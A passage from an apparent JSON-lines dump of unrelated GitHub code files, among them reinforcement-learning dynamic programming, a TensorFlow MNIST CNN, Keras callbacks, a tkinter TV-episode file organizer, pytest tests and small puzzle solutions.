table to the updated_value_table\n updated_value_table = np.copy(state_value)\n sweeps_history.append(updated_value_table)\n _, Q_array, policy_array = self.policy_improvement(state_value)\n self.vi_history.append([state_value,Q_array, policy_array] )\n # Now we calculate Q Value for each actions in the state\n # and update the value of a state with maximum Q value\n\n for state in self.P:\n # initialize the Q table for a state\n Q_table = np.zeros(len(self.P[state]))\n for action in self.P[state]:\n next_states_rewards = []\n for next_sr in self.P[state][action]:\n trans_prob, next_state, reward_prob, done = next_sr\n Q_table[action] += (trans_prob * (\n reward_prob + self.gamma * (state_value[next_state] if not done else 0)))\n state_value[state] = max(Q_table)\n # important what norm is chosen! Here we take the taxi-cab norm\n if np.sum(np.fabs(updated_value_table - state_value)) <= threshold:\n sweeps_history.append(state_value)\n _, Q_array, policy_array = self.policy_improvement(state_value)\n self.vi_history.append([state_value, Q_array, policy_array])\n print(f'Value-iteration converged at iteration {(n_iter + 1)}')\n break\n\n return sweeps_history\n\n def policy_improvement(self, state_value=None):\n #\n # if state_value is None:\n # state_value = self.state_value\n # print('start policy improvement')\n # initialize the policy with zeros\n policy = np.zeros(self.observation_space.n)\n Q_array = np.zeros((self.observation_space.n, self.observation_space.n))\n policy_array = np.zeros((self.observation_space.n, self.observation_space.n))\n\n for state in self.P:\n # initialize the Q table for a state\n # Q_table = np.zeros(len(self.P[state]))\n Q_table = np.zeros(len(self.P[state]))\n # compute Q value for all actions in the state\n for action in self.P[state]:\n for next_sr in self.P[state][action]:\n trans_prob, next_state, reward_prob, done = next_sr\n Q_table[action] += (\n trans_prob * (reward_prob + self.gamma * state_value[next_state] * (1 - done)))\n # rounding is important to minimize numerical effects\n Q_table[action] = Q_table[action].round(10)\n Q_array[action, state] = Q_table[action]\n # dont't forget to remove the non-terminal policies - (zero action)\n if len(Q_table) > 1 and not self.gamma < 1:\n indices = np.where(Q_table[1:] == Q_table[1:].max())[0] + 1\n else:\n indices = np.where(Q_table == Q_table.max())[0]\n policy_array[indices, state] = 1\n\n # select the action which has maximum Q value as an optimal action of the state\n # policy[state] = random.choice(indices)\n policy[state] = indices[0]\n # print('Q:\\n', Q_array)\n # print('new policy: ', policy)\n\n # self.plot_current_policy(policy_array, Q_array, state_value, fig=self.fig)\n return policy, Q_array, policy_array\n\n def policy_evaluation(self, policy, state_value=None):\n \"\"\"Inplace policy evaluation. The existence and uniqueness of v are guaranteed as long as either gamma < 1\n or eventual termination is guaranteed from all states under the policy pi. We have to exclude actions which\n lead to an infinite horizon or set gamma < 1 \"\"\"\n if state_value is None:\n # initialize value table with zeros\n state_value = np.zeros(self.observation_space.n)\n\n # set the threshold\n threshold = 1e-20\n max_number_sweeps = 20000\n\n for sweep_nr in range(max_number_sweeps):\n delta = 0\n # for each state in the environment, select the action according to the policy and compute the value table\n for state in self.P:\n v = state_value[state]\n action = policy[state]\n # build the value table with the selected action\n state_value[state] = sum([trans_prob * (reward +\n self.gamma * (\n state_value[next_state] * (1 - done)))\n for trans_prob, next_state, reward, done in self.P[state][action]])\n delta = max(delta, abs(v - state_value[state]))\n if delta < threshold: break\n\n return state_value, sweep_nr\n\n def policy_iteration(self):\n # Initialize policy with zeros\n old_policy = np.zeros(self.observation_space.n)\n new_value_function = np.zeros(self.observation_space.n)\n no_of_iterations = 20000\n self.policy_improvement(state_value=np.zeros(self.observation_space.n))\n\n print('start v: ', new_value_function)\n print('start p: ', old_policy)\n for i in range(no_of_iterations):\n\n # compute the value function\n new_value_function, sweep_nr = self.policy_evaluation(old_policy) # , new_value_function)\n print('new v: ', new_value_function, np.mean(new_value_function))\n # Extract new policy from the computed value function\n new_policy, Q_array, policy_array = self.policy_improvement(new_value_function)\n\n self.pi_history.append([new_value_function, Q_array, policy_array])\n # self.update_plot(len(self.history)-1)\n print('new p: ', new_policy)\n # Then we check whether we have reached convergence i.e whether we found the optimal\n # policy by comparing old_policy and new policy if it same we will break the iteration\n # else we update old_policy with new_policy\n\n if (np.all(old_policy == new_policy)):\n print('Policy-Iteration converged at step %d.' % (i + 1))\n break\n old_policy = new_policy\n print(\"final p\", new_policy)\n return new_policy\n\n def init_plot(self, fig=None, label=None):\n \"\"\"Create figure for plotting \"\"\"\n if fig is None:\n if self.fig is None:\n self.fig = plt.figure()\n fig = self.fig\n else:\n fig = fig\n\n # dummy elements\n Q_array = np.zeros((self.observation_space.n, self.observation_space.n))\n policy_array = np.zeros((self.observation_space.n, self.observation_space.n))\n state_value = np.zeros(self.observation_space.n)\n\n # ax = plt.subplot(221)\n self.ax1 = plt.subplot2grid((4, 2), (0, 0), rowspan=3, fig=fig)\n ax1 = self.ax1\n ax1.set_xlabel(\"state\")\n ax1.set_ylabel(\"action(state)\")\n extent = (0, self.TARGET, 0, self.TARGET)\n im1 = ax1.imshow(np.flipud(policy_array), cmap=plt.cm.hot, origin='upper', extent=extent)\n ax1.set_ylim(0, int(1 + self.TARGET / 2))\n # ax = plt.subplot(222, sharey=ax)\n self.ax2 = plt.subplot2grid((4, 2), (0, 1), sharey=ax1, rowspan=3)\n ax2 = self.ax2\n im2 = ax2.imshow(np.flipud(Q_array), cmap=plt.get_cmap('turbo'), origin='upper', extent=extent)\n\n divider = make_axes_locatable(ax2)\n self.cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cax = self.cax\n cbar = plt.colorbar(im2, cax=cax)\n cbar.ax.set_ylabel('Q(s,a)')\n ax2.set_xlabel(\"state\")\n ax2.set_ylabel(\"action(state)\")\n # ax = plt.subplot(212)\n self.ax3 = plt.subplot2grid((4, 2), (3, 0), colspan=2)\n ax3 = self.ax3\n # ax.matshow([state_value])\n ax3.plot(state_value)\n ax3.set_xlabel('state')\n ax3.set_ylabel('state value function')\n plt.yticks([])\n\n if label is None:\n label = f'$P_h$={gambler.HEAD_PROB}'\n\n fig.suptitle(label)\n fig.tight_layout()\n self.clear_plot()\n return fig\n\n # def init_func(self):\n # \"\"\"needed for the animation\"\"\"\n # self.ax1.clear()\n # self.ax2.clear()\n # self.ax3.clear()\n # # pass\n # # for ax in self.fig.get_axes():\n # # ax.clear()\n\n def plot_current_policy(self, policy_array, Q_array, state_value, label=None):\n fig = self.fig\n # ax = plt.subplot(221)\n # ax1 = plt.subplot2grid((4, 2), (0, 0), rowspan=3, fig=fig)\n ax1 = self.ax1\n ax1.set_xlabel(\"state\")\n ax1.set_ylabel(\"action(state)\")\n extent = (0, self.TARGET, 0, self.TARGET)\n im1 = ax1.imshow(np.flipud(policy_array), cmap=plt.cm.hot, origin='upper', extent=extent)\n ax1.set_ylim(0, int(1 + self.TARGET / 2))\n # ax = plt.subplot(222, sharey=ax)\n ax2 = self.ax2\n im2 = ax2.imshow(np.flipud(Q_array), cmap=plt.get_cmap('turbo'), origin='upper', extent=extent)\n\n divider = make_axes_locatable(ax2)\n # cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cax = self.cax\n cbar = plt.colorbar(im2, cax=cax)\n cbar.ax.set_ylabel('Q(s,a)')\n ax2.set_xlabel(\"state\")\n ax2.set_ylabel(\"action(state)\")\n # ax = plt.subplot(212)\n ax3 = self.ax3\n # ax.matshow([state_value])\n ax3.plot(state_value)\n ax3.set_xlabel('state')\n ax3.set_ylabel('state value function')\n plt.yticks([])\n\n if label is None:\n label = f'$P_h$={gambler.HEAD_PROB}'\n\n fig.suptitle(label)\n fig.tight_layout()\n\n # self.ims.append([])\n # fig.show()\n def clear_plot(self):\n self.ax1.clear()\n self.ax2.clear()\n self.ax3.clear()\n self.cax.clear()\n\n def update_plot(self, values, iteration):\n self.clear_plot()\n state_value, Q_array, policy_array = values\n self.plot_current_policy(policy_array=policy_array,\n Q_array=Q_array,\n state_value=state_value, label=f'$P_h$={gambler.HEAD_PROB} it: {iteration}')\n # self.fig.show()\n # plt.pause(.1)\n\n\nif __name__ == '__main__':\n from matplotlib.animation import FFMpegWriter\n head_prob = 0.4\n target = 30\n\n # matplotlib.use(\"TkAgg\")\n gambler = Gambler(head_prob=head_prob, target=target)\n\n fig = gambler.init_plot()\n gambler.policy_iteration()\n\n metadata = dict(title='Movie Test', artist='Matplotlib',\n comment='Movie support!')\n writer = FFMpegWriter(fps=1, metadata=metadata)\n\n with writer.saving(fig, f'images/Gambler PI head_prob {head_prob} target {target}.mp4', 100):\n for i, values in enumerate(gambler.pi_history):\n gambler.update_plot(values, i)\n fig.show()\n writer.grab_frame()\n\n fig = gambler.init_plot()\n gambler.value_iteration()\n\n with writer.saving(fig, f'images/Gambler VI head_prob {head_prob} target {target}.mp4', 100):\n for i, values in enumerate(gambler.vi_history):\n gambler.update_plot(values, i)\n # fig.show()\n writer.grab_frame()\n\n fig.savefig(f'images/Gambler PI head_prob {head_prob} target {target}.pdf')\n fig.savefig(f'images/Gambler PI head_prob {head_prob} target {target}.png')\n fig.show()\n\n\n","repo_name":"MathPhysSim/GamblersProblem","sub_path":"Gamblers_problem.py","file_name":"Gamblers_problem.py","file_ext":"py","file_size_in_byte":15053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23183897541","text":"'''\n\n\n\n#----------------------------#\n\nhttps://www.cnblogs.com/geaozhang/p/7111961.html\n\n'''\n\nimport time\nfrom termcolor import colored\n\n\ndef main_process():\n t = '''\n q: Python中是如何管理内存的?\n ans: Python有一个私有堆空间来保存所有的对象和数据结构。\n 作为开发者,我们无法访问它,是解释器在管理它。但是有了核心API后,我们可以访问一些工具。\n Python内存管理器控制内存分配。\n\n 另外,内置垃圾回收器会回收使用所有的未使用内存,所以使其适用于堆空间。\n\n \n '''\n print(colored('-'*20, 'red'), t)\n\n a = 123\n b = a\n print(id(a), id(b))\n\n a = 456\n print(id(a), id(b))\n\n a = 1\n b = 1\n print(a is b)\n c = \"good\"\n d = \"good\"\n print(c is d)\n g = []\n h = []\n print(g is h)\n\n import sys\n a = [1, 2, 3]\n print(sys.getrefcount(a), '''当使用某个引用作为参数,传递给getrefcount()时,参数实际上创建了一个临时的引用。\\\n 因此,getrefcount()所得到的结果,会比期望的多1。''')\n b = a\n print(sys.getrefcount(a))\n\n\nif __name__ == \"__main__\":\n tic = time.process_time()\n \n main_process()\n\n toc = time.process_time()\n print(\"time=\",toc - tic)\n\n\n\n\n\n","repo_name":"greatabel/puzzle_I_cracked","sub_path":"4PythonAlgorithmInterview/python_interview/i8py_manage_memory.py","file_name":"i8py_manage_memory.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"zh","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"36089608231","text":"import os\nimport tensorflow as tf\nimport numpy as np\nimport time\nfrom .config_reader import Config_reader\n\n\nclass Callbacks:\n def __init__(self):\n pass\n\n def get_time_stamp(self, filemname):\n timstamp = time.asctime().replace(\" \", \"_\").replace(\":\", '_')\n unique_name = f'{filemname}_at_{timstamp}'\n return unique_name\n\n def get_callbacks(self, X_train, content):\n logs = content['logs']\n unique_dir_name = self.get_time_stamp('tb_logs')\n tensorboard_root_log_dir = os.path.join(logs['logs_dir'], logs['TENSORBOARD_ROOT_LOG_DIR'], unique_dir_name)\n os.makedirs(tensorboard_root_log_dir, exist_ok=True)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(log_dir=tensorboard_root_log_dir)\n file_writer = tf.summary.create_file_writer(logdir=tensorboard_root_log_dir)\n with file_writer.as_default():\n images = np.reshape(X_train[10:30], (\n -1, 28, 28, 1)) # here I've taken 20 images and reshaping it to 1 color nchanger .-1 represents 20\n tf.summary.image(\"20 handwritten digit samples\", images, max_outputs=25, step=0)\n\n params = content['params']\n early_stopping_callback = tf.keras.callbacks.EarlyStopping(\n patience=params[\"patience\"],\n restore_best_weights=params[\"restore_best_weights\"])\n artifacts = content['artifacts']\n CKPT_dir = os.path.join(artifacts[\"artifacts_dir\"], artifacts[\"CHECKPOINT_DIR\"])\n os.makedirs(CKPT_dir, exist_ok=True)\n CKPT_path = os.path.join(CKPT_dir, \"model_ckpt.h5\")\n\n checkpointing_cb = tf.keras.callbacks.ModelCheckpoint(CKPT_path, save_best_only=True)\n\n return [tensorboard_cb, early_stopping_callback, checkpointing_cb]\n","repo_name":"someshnaman/-ANN-implementation-handwritter_mnist","sub_path":"src/utils/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15585801462","text":"import os\r\nimport os.path\r\nimport shutil\r\nimport re\r\n\r\n\r\ntry:\r\n from Tkinter import *\r\n\r\nexcept ImportError:\r\n import tkinter as tk\r\n import tkinter.ttk as ttk\r\n\r\nbgColor = '#262a30'\r\nugly_patterns = '(?i)(-BTN|720px265|-Snahp|sujaidr|XviD-YL4|XviD-AFG|\\[Kyle-E\\]|-BRISK\\[\\]|-CRAVERS|PRiME|CodeDonut|AC3|DADDY|INTERNAL|2009|hdtv-lol|.HDTV.x264-KILLERS\\[eztv\\]|-BATV|-SVA|X264|.x264-AVS\\eztv\\]|-W4F|x264|-MiNDTHEGAP|-DIMENSION|-AVS|.PROPER|.HDTV.|.x264|.x264-AVS\\[eztv\\]|-KILLERS|-FLEET|\\[eztv\\]|\\[ettv\\]|-FUM)'\r\n\r\n\r\nclass FileCopier():\r\n\r\n def startCopy(self):\r\n dir_files = os.listdir()\r\n print(dir_files)\r\n self.rename_files(dir_files)\r\n self.copy_to_dir()\r\n\r\n def rename_files(self, dir_files):\r\n\r\n whatdo = \"\\t\\t[ RENAMING FILES ] \"\r\n self.textbox.insert(tk.END, whatdo+'\\n')\r\n\r\n print (whatdo)\r\n\r\n for file in dir_files:\r\n if os.path.isfile(file) :\r\n if file.endswith(\".mkv\") or file.endswith(\".avi\") or file.endswith(\".mp4\"):\r\n previous_name = file\r\n\r\n if re.search(ugly_patterns,previous_name):\r\n\r\n previous_name = re.sub(ugly_patterns, '', previous_name)\r\n previous_name = previous_name.split(\".\")\r\n\r\n i = len(file)-3\r\n j = len(file)\r\n\r\n file_ext = {}\r\n file_ext[file] = file[i : j]\r\n\r\n previous_name = \" \".join(previous_name)\r\n new_filename = previous_name[0:i]\r\n x = len(new_filename)-4\r\n\r\n new_filename = new_filename[0: x]\r\n new_filename += \".\" + file_ext[file]\r\n\r\n print(new_filename)\r\n\r\n self.textbox.insert(tk.END,new_filename+'\\n')\r\n new_filename.strip();\r\n os.rename(file,new_filename)\r\n\r\n def copy_to_dir(self):\r\n\r\n whatdo = \"\\n\\t\\t[ COPYING FILES ]\"\r\n src = \"D:\\\\Tv Shows\"\r\n dest_dir = os.listdir(src)\r\n file_list = os.listdir()\r\n\r\n print (whatdo)\r\n self.textbox.insert(tk.END,whatdo+'\\n')\r\n for file in file_list:\r\n if file.endswith(\".mkv\") or file.endswith(\".avi\") or file.endswith(\".mp4\"):\r\n for folder in dest_dir:\r\n\r\n rex = re.escape(folder) + r\".(S[0-9][0-9]| E[0-9][0-9])\"\r\n if re.match(rex,file,re.IGNORECASE) and not os.path.isfile(os.path.join(src,folder)):\r\n\r\n print(src + '\\\\' + folder + \" <- \"+file + \"\\n\")\r\n self.textbox.insert(tk.END, src + '\\\\' + folder + ' <- ' + file + '\\n')\r\n shutil.copy(file,src+\"\\\\\"+folder)\r\n os.remove(file)\r\n\r\n src = \"F:\\\\Tv Shows\"\r\n dest_dir = os.listdir(src)\r\n file_list = os.listdir()\r\n\r\n print (whatdo)\r\n\r\n for file in file_list:\r\n if file.endswith(\".mkv\") or file.endswith(\".avi\") or file.endswith(\".mp4\"):\r\n for folder in dest_dir:\r\n\r\n rex = re.escape(folder) + r\".(S[0-9][0-9]| E[0-9][0-9])\"\r\n if re.match(rex,file,re.I) and not os.path.isfile(os.path.join(src, folder)):\r\n\r\n print( src + '\\\\' + folder + \" <- \"+file + \"\\n\")\r\n\r\n self.textbox.insert(tk.END, src + '\\\\' + folder + ' <- ' + file + '\\n')\r\n shutil.copy(file, src+\"\\\\\"+folder)\r\n os.remove(file)\r\n\r\n src = \"E:\\\\Tv Shows\"\r\n dest_dir = os.listdir(src)\r\n file_list = os.listdir()\r\n\r\n print(whatdo)\r\n\r\n for file in file_list:\r\n if file.endswith(\".mkv\") or file.endswith(\".avi\") or file.endswith(\".mp4\"):\r\n for folder in dest_dir:\r\n\r\n rex = re.escape(folder) + r\".(S[0-9][0-9]| E[0-9][0-9])\"\r\n if re.match(rex,file,re.I) and not os.path.isfile(os.path.join(src, folder)):\r\n\r\n print( src + '\\\\' + folder + \" <- \"+file + \"\\n\")\r\n\r\n self.textbox.insert(tk.END, src + '\\\\' + folder + ' <- ' + file + '\\n')\r\n shutil.copy(file, src+\"\\\\\"+folder)\r\n os.remove(file)\r\n\r\n def hello(self):\r\n \r\n pWindow = tk.Tk()\r\n pWindow.config(bg=bgColor)\r\n pTextbox = tk.Text(pWindow,bg=bgColor,fg='#fff')\r\n pTextbox.grid(row=0,column=0,columnspan=2)\r\n pTextbox.insert(tk.END,ugly_patterns)\r\n\r\n startButton = tk.Button(pTextbox,text='add pattern',bg=bgColor,fg='#fff')\r\n patternEntryLabel = tk.Label(pWindow,bg=bgColor,fg='#FFF',text='Add New Pattern:')\r\n patternEntryLabel.grid(row=1,column=0)\r\n patternEntry = tk.Entry(pWindow,bg=bgColor,fg='#fff',width=50)\r\n patternEntry.grid(row=1,column=1)\r\n \r\n\r\n def __init__(self, parent):\r\n\r\n labelframe_color = 'cyan'\r\n parent.wm_title(\"File Copier\")\r\n parent.iconbitmap(r'c:\\Python27\\DLLs\\py.ico')\r\n\r\n labelFrameColor = '#0092bf'\r\n windowWidth = 600\r\n windowHeight = 600\r\n\r\n #patternButton = tk.Button(root, text=\"Patterns\", fg='#FFF', relief=tk.FLAT, bg=bgColor, command=self.hello)\r\n #patternButton.grid(row=0,column=0, sticky='N')\r\n\r\n labelframe0 = tk.LabelFrame(parent, bg=labelframe_color) \r\n startButton = tk.Button(root, text=\"Start\", relief=tk.FLAT, fg=\"#fff\", bg=bgColor, command=self.startCopy)\r\n self.textbox = tk.Text(root, bg=bgColor, fg='#fff', wrap='char', width=55, height=25, relief=tk.FLAT) \r\n labelframe0.config(height=1, width=windowWidth)\r\n self.textbox.grid(padx=25, pady=27, row=0, column=0, columnspan=4)\r\n labelframe0.grid(row=2, column=0, columnspan=4)\r\n\r\n startButton.grid(row=3, column=0, columnspan=4)\r\n\r\n #parent.config(menu=menubar)\r\n parent.configure(background=bgColor)\r\n parent.resizable(width=False, height=False)\r\n parent.geometry('{}x{}'.format(windowWidth, windowHeight))\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n root = tk.Tk()\r\n FileCopier(root)\r\n root.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"albertg0/file-organizer","sub_path":"file-organizer.py","file_name":"file-organizer.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26088578285","text":"from tensorflow.examples.tutorials.mnist import input_data\r\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\r\n\r\nimport tensorflow as tf\r\nsess = tf.InteractiveSession()\r\n\r\n\r\ndef variable_summaries(name,var):\r\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\r\n with tf.name_scope(name):\r\n mean = tf.reduce_mean(var)\r\n tf.summary.scalar('mean', mean)\r\n with tf.name_scope('stddev'):\r\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\r\n tf.summary.scalar('stddev', stddev)\r\n tf.summary.scalar('max', tf.reduce_max(var))\r\n tf.summary.scalar('min', tf.reduce_min(var))\r\n tf.summary.histogram('histogram', var)\r\n\r\ndef weight_variable(shape):\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial)\r\n\r\ndef bias_variable(shape):\r\n initial = tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial)\r\n\r\ndef conv2d(x, W):\r\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\r\n\r\ndef max_pool_2x2(x):\r\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\r\n strides=[1, 2, 2, 1], padding='SAME')\r\n\r\nx = tf.placeholder(tf.float32, shape=[None, 784])\r\ny_ = tf.placeholder(tf.float32, shape=[None, 10])\r\n\r\nwith tf.name_scope('input_reshape'):\r\n image_shaped_input = tf.reshape(x, [-1, 28, 28, 1])\r\n tf.summary.image('input', image_shaped_input, 10)\r\n\r\nW_conv1 = weight_variable([5, 5, 1, 32])\r\nb_conv1 = bias_variable([32])\r\nvariable_summaries('W_conv1',W_conv1)\r\nvariable_summaries('b_conv1',b_conv1)\r\n\r\nx_image = tf.reshape(x, [-1,28,28,1])\r\n\r\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\r\nh_pool1 = max_pool_2x2(h_conv1)\r\n\r\nW_conv2 = weight_variable([5, 5, 32, 64])\r\nb_conv2 = bias_variable([64])\r\nvariable_summaries('W_conv2',W_conv2)\r\nvariable_summaries('b_conv2',b_conv2)\r\n\r\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\r\nh_pool2 = max_pool_2x2(h_conv2)\r\n\r\nW_fc1 = weight_variable([7 * 7 * 64, 1024])\r\nb_fc1 = bias_variable([1024])\r\nvariable_summaries('W_fc1',W_fc1)\r\nvariable_summaries('b_fc1',b_fc1)\r\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\r\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\r\n\r\nkeep_prob = tf.placeholder(tf.float32)\r\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\r\n\r\nW_fc2 = weight_variable([1024, 10])\r\nb_fc2 = bias_variable([10])\r\nvariable_summaries('W_fc2',W_fc2)\r\nvariable_summaries('b_fc2',b_fc2)\r\ny_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\r\n\r\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y_conv, y_))\r\ntf.summary.scalar('Cross-entropy',cross_entropy)\r\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\r\ncorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\nsess.run(tf.global_variables_initializer())\r\ntf.summary.scalar('Accuracy',accuracy)\r\nmerged = tf.summary.merge_all()\r\ntrain=tf.summary.FileWriter('./logs',sess.graph)\r\nfor i in range(20000):\r\n batch = mnist.train.next_batch(50)\r\n if i%100 == 0:\r\n train_accuracy = accuracy.eval(feed_dict={x:batch[0], y_: batch[1], keep_prob: 1.0})\r\n print(\"step %d, training accuracy %g%%\"%(i, 100*train_accuracy))\r\n summary = sess.run(merged, feed_dict={x: batch[0], y_: batch[1], keep_prob: 1.0})\r\n train.add_summary(summary,i)\r\n train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\r\n\r\nprint(\"test accuracy %g%%\"%100*accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))","repo_name":"kmbae13/testing_codes","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11943326191","text":"#! /usr/bin/env python3\n\n# Default settings\nATTR_OFF = \"\\033[0m\"\nDEFAULT = \"\\033[99m\"\nBOLD = \"\\033[1m\"\nUNDERLINE = \"\\033[4m\"\n\n# Colours\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nPINK = \"\\033[95m\"\nCYAN = \"\\033[96m\"\nWHITE = \"\\033[97m\"\n\n# Lighter colours\nLIGHT_RED = \"\\033[31m\"\nLIGHT_GREEN = \"\\033[32m\"\nBROWN = \"\\033[33m\"\nLIGHT_BLUE = \"\\033[34m\"\nPALE_CYAN = \"\\033[36m\"\nGREY = \"\\033[37m\"\n\n# Background colours\nHIGHLIGHT_WHITE_ON_BLACK = \"\\033[7m\"\nHIGHLIGHT_RED = \"\\033[101m\"\nHIGHLIGHT_GREEN = \"\\033[102m\"\nHIGHLIGHT_YELLOW = \"\\033[103m\"\nHIGHLIGHT_BLUE = \"\\033[104m\"\nHIGHLIGHT_PINK = \"\\033[105m\"\nHIGHLIGHT_CYAN = \"\\033[106m\"\nHIGHLIGHT_WHITE = \"\\033[107m\"\n\ndef cprint(colour, *string):\n print(colour, *string, ATTR_OFF, sep=\"\")","repo_name":"zst123/code_xtremeapps_2017-setup","sub_path":"setup_sensorup/colours.py","file_name":"colours.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34500549914","text":"with open(\"7.txt\") as f:\n cont = f.read().split(\",\")\n\ncont = [int(i) for i in cont]\n\nminimumFuel = 10000000\n\nfor i in range(min(cont),max(cont)):\n fuelUsed = sum([abs(i-x) for x in cont])\n minimumFuel = min(minimumFuel,fuelUsed)\n\n print(i,minimumFuel,fuelUsed)","repo_name":"Sebbben/Public","sub_path":"AdventOfCode/2021/7-1.py","file_name":"7-1.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29233831197","text":"import pytest\nfrom smb.common.testing_utils import dt\n\nfrom maps_adv.geosmb.doorman.server.lib.enums import CallEvent, OrderEvent, SegmentType\n\npytestmark = [\n pytest.mark.asyncio,\n pytest.mark.freeze_time(\"2020-01-01 00:00:01\", tick=True),\n]\n\n\nasync def test_segments_as_no_order_clients_without_events(factory, dm):\n await factory.create_empty_client()\n await factory.create_empty_client()\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"current_size\"] == 2\n\n\nasync def test_segments_as_no_order_clients_without_order_events(factory, dm):\n client_id = await factory.create_empty_client()\n await factory.create_call_event(client_id, event_type=CallEvent.INITIATED)\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"current_size\"] == 1\n\n\n@pytest.mark.parametrize(\"event_type\", OrderEvent)\n@pytest.mark.parametrize(\n \"event_ts\", (dt(\"2020-01-01 00:00:00\"), dt(\"2018-01-01 00:00:00\"))\n)\nasync def test_skips_client_with_order_events(factory, dm, event_type, event_ts):\n client_id = await factory.create_empty_client()\n await factory.create_order_event(\n client_id=client_id, event_type=event_type, event_timestamp=event_ts\n )\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"current_size\"] == 0\n\n\nasync def test_skips_client_with_other_biz_id(factory, dm):\n await factory.create_client(biz_id=999)\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"current_size\"] == 0\n\n\nasync def test_returns_previous_segment_size(factory, dm):\n # Was in segment, but left it\n client_id_1 = await factory.create_empty_client(created_at=dt(\"2019-09-10\"))\n # Was in segment and still there\n await factory.create_empty_client(created_at=dt(\"2019-09-10\"))\n\n await factory.create_order_event(\n client_id=client_id_1,\n event_type=OrderEvent.CREATED,\n event_timestamp=dt(\"2019-12-20\"),\n )\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"previous_size\"] == 2\n\n\nasync def test_skips_clients_created_later_for_previous(factory, dm):\n client_id_1 = await factory.create_empty_client(created_at=dt(\"2019-12-10\"))\n await factory.create_empty_client(created_at=dt(\"2019-12-10\"))\n\n await factory.create_order_event(\n client_id=client_id_1,\n event_type=OrderEvent.CREATED,\n event_timestamp=dt(\"2019-12-20\"),\n )\n\n _, got, _ = await dm.list_segments(123)\n\n assert got[SegmentType.NO_ORDERS][\"previous_size\"] == 0\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/data_managers/list_segments/test_no_orders_segment.py","file_name":"test_no_orders_segment.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42290445683","text":"thres = 1000000000000000000\n\n#log(b)\ndef power(a,b):\n result = 1\n while b>0:\n if b%2==1:\n result = result * a\n if result>thres:\n return -1\n\n a = a*a\n b = b//2\n \n return result\n\n\n#log2(n)*log2(n)\ndef bin_search():\n low = 2\n high = last\n\n while low<high:\n mid = (low+high)//2\n\n temp = power(mid,n-1)\n if temp>last or temp==-1:\n high = mid-1\n else:\n low=mid+1\n \n return low,high\n\n\n#O(n)*log(n)\ndef calculate(num):\n res = 0\n for i in range(n):\n temp = abs(a[i]-power(num,i))\n res+=temp\n return res\n\n\nn = int(input())\na = list(map(int,input().split()))#O(n)\na.sort()\n\nlast = a[-1]\n\n#log2(n)\nfirst,second = bin_search()\n\n\n#O(4n) - max\nresult = thres\nfor i in range(second-1,first+2):\n temp = calculate(i)\n result = min(result,temp)\n\nprint(result)\n\n\n\n\n\n","repo_name":"Shovon588/Programming","sub_path":"Codeforces with Python/1397B. Power Sequence.py","file_name":"1397B. Power Sequence.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"11638213012","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport opengate as gate\nfrom opengate.tests import utility\nfrom opengate.userhooks import check_production_cuts\nfrom test013_phys_lists_helpers import (\n create_pl_sim,\n)\n\nif __name__ == \"__main__\":\n paths = 